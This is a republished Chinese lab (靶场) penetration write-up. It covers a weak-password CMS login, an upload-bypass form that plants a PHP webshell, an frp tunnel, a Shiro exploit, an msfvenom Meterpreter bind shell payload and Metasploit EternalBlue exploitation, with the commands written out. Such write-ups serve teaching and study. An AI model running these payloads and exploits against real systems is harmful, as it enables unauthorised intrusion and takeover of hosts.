记一次内网靶场渗透WP

admin
admin
admin
138638
文章
114
评论
2025年2月15日23:50:54评论13 views字数 3180阅读10分36秒阅读模式

声明

以下内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。

0x01 前言

此次靶场渗透思路,攻击者通过VPS(kali-linux)服务器以WEB_1-(ubuntu,双网卡)为入口。
横向到一个WEB_2(windows 7,双网卡)通过双网卡进行横向探测,发现OS_3,利用目标存在的系统漏洞获取目标系统权限。

0x02 靶场拓扑

记一次内网靶场渗透WP

0x03 渗透过程

访问WEB_1服务器地址:
http://192.168.28.135发现为JunAMS
扫描后台管理地址成功获取地址:
http://192.168.28.135/admin.php并成功跳转至管理页面。
记一次内网靶场渗透WP
JunAMS存在弱口令用户名及密码为admin/admin,成功登录后台。
记一次内网靶场渗透WP
尝试查找sql注入及文件上传等漏洞点,访问“系统设置----版本管理----图片上传”位置存在文件上传点。
记一次内网靶场渗透WP
尝试上传shell,发现这里限制了上传文件的后缀,这里进行绕过,构造表单test.html:
<formenctype="multipart/form-data"action="http://192.168.128.135//admin.php/common/add_images.html"method="post">  <input type="file" name="file"size="50"><br>  <input type="submit" value="Upload">  </form>
本地运行表单test.html,利用该表单上传php一句话木马,成功获取路径。
记一次内网靶场渗透WP
记一次内网靶场渗透WP
shell连接地址:
http://192.168.128.135/public/edit/20220402/242db6cd3f6d952c2419bb844e84b4ed.php
蚁剑连接shell后,查看网络配置发现是双网卡,上传fscan针对内网网段进行扫描。
记一次内网靶场渗透WP
发现内网存活Apache Tomcat服务器,地址为http://192.168.20.140:8080
记一次内网靶场渗透WP
为了实现攻击端访问内网目标,在WEB_1服务器上传frp客户端,在VPS(kali-linux)开启frp服务端监听,建立通信。
记一次内网靶场渗透WP
记一次内网靶场渗透WP
VPS成功访问WEB_2内网服务器http://192.168.20.140:8080
记一次内网靶场渗透WP
对WEB_2网站路径扫描发现
http://192.168.20.140:8080/shiro,根据提示直接上工具。
记一次内网靶场渗透WP
发现存在shiro框架,并成功爆破利用链,查看网络信息,发现依然是双网卡,可进行横向信息搜集。
记一次内网靶场渗透WP
内存马写入失败,尝试直接写jsp马,直接在工具中修改路径为/shell.jsp,成功获取shell路径。
(避坑:蚁剑连接时需要添加实际路径例如:
http://192.168.20.140:8080/shiro/shell.jsp)
记一次内网靶场渗透WP
上传fscan至WEB_2进行横向移动,发现192.168.30.140(OS_3)。
存在ms17_010漏洞,生成正向连接的payload.exe,将其上传至WEB_2目标服务器并运行:
msfvenom -pwindows/x64/meterpreter/bind_tcp RHOST=192.168.20.140RPORT=4444 -f exe >payload.exe
VPS建立msf监听:
msf6 > useexploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp//建立正向监听msf6 exploit(multi/handler) > set RHOST 192.168.20.130   //目标IPmsf6 exploit(multi/handler) > set LPORT 4444       //本地监听端口msf6 exploit(multi/handler) > setg Proxies socks5:127.0.0.1:6000 //设置Socks5代理msf6 exploit(multi/handler) > exploit meterpreter >     //成功获取WEB_2目标权限
记一次内网靶场渗透WP
meterpreter >run autoroute -s 192.168.30.0/24 //添加目标环境网络meterpreter > background //保存session会话[*] Backgrounding session
记一次内网靶场渗透WP
验证OS_3目标主机漏洞是否存在。
msf6exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010 //使用ms17-010扫描模块msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.30.140  //目标主机msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit [+] 192.168.30.140:445   - Host is likely VULNERABLE to MS17-010! -Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)[*] Auxiliary module execution completed              //目标主机存在ms17-010漏洞msf6 auxiliary(scanner/smb/smb_ms17_010) >
使用msf中ms17-010模块攻击目标OS_3。
msf6auxiliary(scanner/smb/smb_ms17_010) > useexploit/windows/smb/ms17_010_eternalbluemsf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcpmsf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.30.140//目标主机msf6 exploit(windows/smb/ms17_010_eternalblue) >set LPORT 6601   //本地监听端口msf6 exploit(windows/smb/ms17_010_eternalblue) >exploitmeterpreter > //成功获取系统权限
记一次内网靶场渗透WP

0x04 总结

针对WEB_1进行信息搜集发现存在JunAMS,并获取后台管理地址,利用JunAMS后台弱口令并利用CMS上传点获取webshell,利用frp进行代理转发并对其内网进行横向信息搜集。
kali-linux生成payload上传至WEB_2,利用msf配置二级代理渗透OS_3,利用ms17_010漏洞获取OS_3系统进行控制权限。

0x05 参考链接

https://blog.csdn.net/qq_48985780/article/details/122240823
记一次内网靶场渗透WP
记一次内网靶场渗透WP
记一次内网靶场渗透WP

▇ 扫码关注我们 ▇

长白山攻防实验室

学习最新技术知识

原文始发于微信公众号(长白山攻防实验室):记一次内网靶场渗透WP

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月15日23:50:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次内网靶场渗透WPhttps://cn-sec.com/archives/1076237.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息